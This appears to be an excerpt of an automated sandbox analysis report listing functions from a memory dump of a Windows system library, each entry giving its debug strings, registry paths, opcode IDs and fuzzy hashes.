                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 36B500C7
                                                                      • RTL: Re-Waiting, xrefs: 36B50128
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 36B500F1
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                      • API String ID: 0-2474120054
                                                                      • Opcode ID: a4ee17f298ad53b830e7b9de301b76c472193036ff480d4f7837fac17282deaf
                                                                      • Instruction ID: 04c2eb7104b53526ecf0cf9207b453dc7719977d2f9acc8fde32aa2bb49f2a21
                                                                      • Opcode Fuzzy Hash: a4ee17f298ad53b830e7b9de301b76c472193036ff480d4f7837fac17282deaf
                                                                      • Instruction Fuzzy Hash: 32E1C174A08751DFE711CF28C840B5ABBE4FB84358F144A59FAA58B2D1DB74D845CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                      • API String ID: 0-1145731471
                                                                      • Opcode ID: 010c278142a50de6cbbc60f926ce86e5a99ab7488c7a27c05d24b221b235792f
                                                                      • Instruction ID: 8192fa4636ce6ecc0a2fc305e32d905f4f47275d7bb111a8972fe79ddca4a425
                                                                      • Opcode Fuzzy Hash: 010c278142a50de6cbbc60f926ce86e5a99ab7488c7a27c05d24b221b235792f
                                                                      • Instruction Fuzzy Hash: 72B1EC74A067168BEB16EF6AC990B9DB3F1EF45794F684429E811EB780D770E840CF20
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                      • API String ID: 0-2391371766
                                                                      • Opcode ID: 04c4746217fc05d43ef53e685cc857db8c0e0107ff005efdb1ae856cd36f13ce
                                                                      • Instruction ID: 6ab42cc1dd824bb478c46f09754e0128368460b9b5c2208bab0d84d0cb66a5b0
                                                                      • Opcode Fuzzy Hash: 04c4746217fc05d43ef53e685cc857db8c0e0107ff005efdb1ae856cd36f13ce
                                                                      • Instruction Fuzzy Hash: 4AB19B71A08355AFE311DF56CC90B5BB7E8EB48758F401929FA449B280DB75E808CFA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$@$\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages
                                                                      • API String ID: 0-1146358195
                                                                      • Opcode ID: cbf167365de1a439716a7261e67c6954a48956b5a2eb77bae93019a9a7e998c3
                                                                      • Instruction ID: da03f961f350e1a528f59cfee852b74a7bf73a6a504ecdb2df9f0b0f68f60c61
                                                                      • Opcode Fuzzy Hash: cbf167365de1a439716a7261e67c6954a48956b5a2eb77bae93019a9a7e998c3
                                                                      • Instruction Fuzzy Hash: 7CA16A71A083919FD711DF65C890B1BBBE8EF84B94F41092DB989A7251DB31DD08CFA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                      • API String ID: 0-318774311
                                                                      • Opcode ID: 46bc35b9cf3ba520bb2154f95fa6baa060f4ac21557ace0e9fbaa227360dbae5
                                                                      • Instruction ID: a4d33c477f7808c5d7eea7d50b99700c4db9400163e8aa603b7cd1a11a7cdfa7
                                                                      • Opcode Fuzzy Hash: 46bc35b9cf3ba520bb2154f95fa6baa060f4ac21557ace0e9fbaa227360dbae5
                                                                      • Instruction Fuzzy Hash: D5817AB5618350AFE721CB25C880B6AB7E8EF84754F410929F9A49B290DB75DD04CFA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                      • API String ID: 0-3870751728
                                                                      • Opcode ID: ac6d742f4e5d9e92f7f71093853dd7ba664e24bbe01ced3beff2c44fdd8ff18f
                                                                      • Instruction ID: 756e12a485bfd505224669a58bb20676c6a72c4f8986460297c25c2b848c21de
                                                                      • Opcode Fuzzy Hash: ac6d742f4e5d9e92f7f71093853dd7ba664e24bbe01ced3beff2c44fdd8ff18f
                                                                      • Instruction Fuzzy Hash: 0D913CB4E006159FEB14CF6AC894B9DBBB1FF48318F24817AE904AB391E7359841CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                      • API String ID: 0-373624363
                                                                      • Opcode ID: ecce0a8fc97a8e010e895cb928647d1af432f89131da7bde790ace74b5293713
                                                                      • Instruction ID: 58c80f7139674bc309b0c33ba9d163050b6a2fa6c188b7ea1ae5e8d9ad7d9e34
                                                                      • Opcode Fuzzy Hash: ecce0a8fc97a8e010e895cb928647d1af432f89131da7bde790ace74b5293713
                                                                      • Instruction Fuzzy Hash: EC91CE75E06365CBEB12CF56CA547ADB7F0EF00368F644196EC11AB290D7789A80CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • TargetNtPath, xrefs: 36BBB3AF
                                                                      • GlobalizationUserSettings, xrefs: 36BBB3B4
                                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 36BBB3AA
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                      • API String ID: 0-505981995
                                                                      • Opcode ID: 5d64a30b11d9a1b8f42bd01bd88997884edc869d35a7a4d983986c2113e2e845
                                                                      • Instruction ID: 79b2fa96913f9e96b69d2174c80986d494e95a05fa54c4485c09017f16d4960a
                                                                      • Opcode Fuzzy Hash: 5d64a30b11d9a1b8f42bd01bd88997884edc869d35a7a4d983986c2113e2e845
                                                                      • Instruction Fuzzy Hash: D0616D72D01229AFDF21DF55DC98BA9B7B8FB04710F4101E9A908AB250DB74DE84CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 36B3E455
                                                                      • HEAP[%wZ]: , xrefs: 36B3E435
                                                                      • HEAP: , xrefs: 36B3E442
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                      • API String ID: 0-1340214556
                                                                      • Opcode ID: bb49ba40e6e0995e4888b51c5fd3522f9b34b02d7efacd57e0dc9e4b51b1a305
                                                                      • Instruction ID: 2f3825e36d401148785319f9a59d8883b7d5e4bc33f28883a7cfdcddf7e954d7
                                                                      • Opcode Fuzzy Hash: bb49ba40e6e0995e4888b51c5fd3522f9b34b02d7efacd57e0dc9e4b51b1a305
                                                                      • Instruction Fuzzy Hash: 02512735A01794EFE712CB65CDA4F9ABBF8FF04344F1440A6E9408B262D734E905CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 36B4A396
                                                                      • LdrpCompleteMapModule, xrefs: 36B4A39D
                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 36B4A3A7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                      • API String ID: 0-1676968949
                                                                      • Opcode ID: 070ff2ca1945962cf5db3a4ff7293c4004413132f24f67194351c6d7e4a57c0c
                                                                      • Instruction ID: 9367e0d853406e6e7a40889ed3f95a5e601ff4055e8f8bde85e2f0ef059a3ff6
                                                                      • Opcode Fuzzy Hash: 070ff2ca1945962cf5db3a4ff7293c4004413132f24f67194351c6d7e4a57c0c
                                                                      • Instruction Fuzzy Hash: 22512278A00761DBF726DBA9C945B0ABFE4EB00758F105194EA529F2D2DB74E800CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • Heap block at %p modified at %p past requested size of %Ix, xrefs: 36B8D7B2
                                                                      • HEAP[%wZ]: , xrefs: 36B8D792
                                                                      • HEAP: , xrefs: 36B8D79F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                      • API String ID: 0-3815128232
                                                                      • Opcode ID: 5ee6cabe78b086f30417b1abb31fefb5489f494d3e1fe352533cf6ba0cd3105b
                                                                      • Instruction ID: f14ce2b65641f8ca4db1c7338f75cd0e18ddda477f5f9f49c189048af3a85245
                                                                      • Opcode Fuzzy Hash: 5ee6cabe78b086f30417b1abb31fefb5489f494d3e1fe352533cf6ba0cd3105b
                                                                      • Instruction Fuzzy Hash: B851E27E5003E48EF350DF2AC84077277E2EB452C8F91488FE4C58B685E62AD846DFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                      • API String ID: 0-1151232445
                                                                      • Opcode ID: 6a1202175c29301ea584fd6c546b79dd9153822f27172e09e40318824c4b8b9b
                                                                      • Instruction ID: 23c2e1ee0bd059875555d1f465873493e022848a73341e849513361aa36467bc
                                                                      • Opcode Fuzzy Hash: 6a1202175c29301ea584fd6c546b79dd9153822f27172e09e40318824c4b8b9b
                                                                      • Instruction Fuzzy Hash: F9412578B413A0CFFB18CE19C4A8769BBE0EF0124AF7440A9CC458F656DAB4D845CF61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 36B51943
                                                                      • LdrpAllocateTls, xrefs: 36B5194A
                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 36B51954
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                      • API String ID: 0-4274184382
                                                                      • Opcode ID: 610262fda28012d478f510796478bf9b018993848317b7a318ec2257a9435038
                                                                      • Instruction ID: 16c5bf7a790c3dc1c8723623f6d9bb581e445cb10ac91087735547722590ed1b
                                                                      • Opcode Fuzzy Hash: 610262fda28012d478f510796478bf9b018993848317b7a318ec2257a9435038
                                                                      • Instruction Fuzzy Hash: 374169B5E00609AFDB14CFA9CD50AAEBBB5FF48304F058129E905BB251DB35A801CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • Actx , xrefs: 36B132CC
                                                                      • RtlCreateActivationContext, xrefs: 36B52803
                                                                      • SXS: %s() passed the empty activation context data, xrefs: 36B52808
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                      • API String ID: 0-859632880
                                                                      • Opcode ID: cc7b22521da76367147df00072e93f6fb994b6906f3a89aec95f2d1658779c86
                                                                      • Instruction ID: 52d24bb4fff4c1a65cc3aca874bc3afcf521d636b2561b7141b618a79a0a4daa
                                                                      • Opcode Fuzzy Hash: cc7b22521da76367147df00072e93f6fb994b6906f3a89aec95f2d1658779c86
                                                                      • Instruction Fuzzy Hash: DA313F72A00315AFEB16CF69E890F9A37A4EF04714F124469EE049F285EB75D806CFE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • @, xrefs: 36B6B2F0
                                                                      • GlobalFlag, xrefs: 36B6B30F
                                                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 36B6B2B2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                      • API String ID: 0-4192008846
                                                                      • Opcode ID: 089447489d1edd123630318db93d68a35559ee48eeb3422fbc4d4e0c2241b0f9
                                                                      • Instruction ID: e593221e271100560ee01ce76ed232a817dd95a0f716e482e0a37117c0d6292a
                                                                      • Opcode Fuzzy Hash: 089447489d1edd123630318db93d68a35559ee48eeb3422fbc4d4e0c2241b0f9
                                                                      • Instruction Fuzzy Hash: C2314AB1E00219AFDB10DFA6CC80AEEBBBCEB44344F400469AA05AB140D6349E04CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • DLL "%wZ" has TLS information at %p, xrefs: 36B5184A
                                                                      • LdrpInitializeTls, xrefs: 36B51851
                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 36B5185B
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                      • API String ID: 0-931879808
                                                                      • Opcode ID: 16a46b1d9a5fbc653495cdcedaa395062db0db656ca07ad643a8db9eb5404c02
                                                                      • Instruction ID: 335c2693f3221d761cfdfee0e25cfe7e8fb5fd5b4558981309b9e0ee04dbf4a7
                                                                      • Opcode Fuzzy Hash: 16a46b1d9a5fbc653495cdcedaa395062db0db656ca07ad643a8db9eb5404c02
                                                                      • Instruction Fuzzy Hash: 8031B172E10214BBE7108F59CC95F9A7EB9EB40399F150159E702BB180EB74AD45CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • @, xrefs: 36B211C5
                                                                      • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 36B2119B
                                                                      • BuildLabEx, xrefs: 36B2122F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                      • API String ID: 0-3051831665
                                                                      • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                      • Instruction ID: f0a554c631157011ce0f9c24207df95e4cc814d54a33e56cbf4cbc6ca603a177
                                                                      • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                      • Instruction Fuzzy Hash: 0D317EB2900619BFDB11DBA5CC44EEEBBB9EB85754F014025FA08E7260E730DA05CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: RtlValidateHeap
                                                                      • API String ID: 3446177414-1797218451
                                                                      • Opcode ID: 40541f864ab4752e2c43199268112b1d6130cca8e5cd239a63c6ee2a205f0898
                                                                      • Instruction ID: b930c312493bcfd4555f674bf8eaad757b77f5983730eca6a7dfcff7d51bac5f
                                                                      • Opcode Fuzzy Hash: 40541f864ab4752e2c43199268112b1d6130cca8e5cd239a63c6ee2a205f0898
                                                                      • Instruction Fuzzy Hash: 19412479B052A5DFDB06CFA4CC64BADBBB2FF80211F648259D8115B280CB34D901DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$@
                                                                      • API String ID: 0-149943524
                                                                      • Opcode ID: 9f336ca53a211b1a86fb0151dd5e6a1a99478366e6805f9335d8c6f37bedcfce
                                                                      • Instruction ID: 4d717eb2ae6a14ca9e60bcf0163800c6f6d5e6af5dfb1987c052c38268dbf97c
                                                                      • Opcode Fuzzy Hash: 9f336ca53a211b1a86fb0151dd5e6a1a99478366e6805f9335d8c6f37bedcfce
                                                                      • Instruction Fuzzy Hash: 16329BB49283218BD7248F16CC90B2EB7E1EF98744F50492EF9958F290E736C954DB93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      • Opcode ID: 4b3f272c2628a07269fb7cc662aec0a9004eb70ca0b5f812dd5568db07789b18
                                                                      • Instruction ID: 00b9c5b691fc1f46265009f5e9ca8fcfc869208423b1b0893c6a2ace852bcb80
                                                                      • Opcode Fuzzy Hash: 4b3f272c2628a07269fb7cc662aec0a9004eb70ca0b5f812dd5568db07789b18
                                                                      • Instruction Fuzzy Hash: 9D31BE31611B22BFE746AF24CE80E8AFB65FF44758F145125E9018BA50DB71E821DFD1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      • Opcode ID: cecbba3b507fb84b23f9a2e78b416f6417c2d8c355cca41736f2e71b7d1b0172
                                                                      • Instruction ID: 5efcfdb6edee152059d543def36fe7f214d480dff1ddec10802249613e467b7d
                                                                      • Opcode Fuzzy Hash: cecbba3b507fb84b23f9a2e78b416f6417c2d8c355cca41736f2e71b7d1b0172
                                                                      • Instruction Fuzzy Hash: FE112771F00326ABEB04AF59C994A5EF7B9EB48268F200079EA09E7300CA749D00CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `$`
                                                                      • API String ID: 0-197956300
                                                                      • Opcode ID: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
                                                                      • Instruction ID: 6678bc9e2f596199bc14a97f4f44a47661faf5fd77974fb85f19389873e7be94
                                                                      • Opcode Fuzzy Hash: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
                                                                      • Instruction Fuzzy Hash: 32C1E1716083919BE724CF26CC40B6BBBE5EF84758F004A2DF995CA290D7B5D905CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
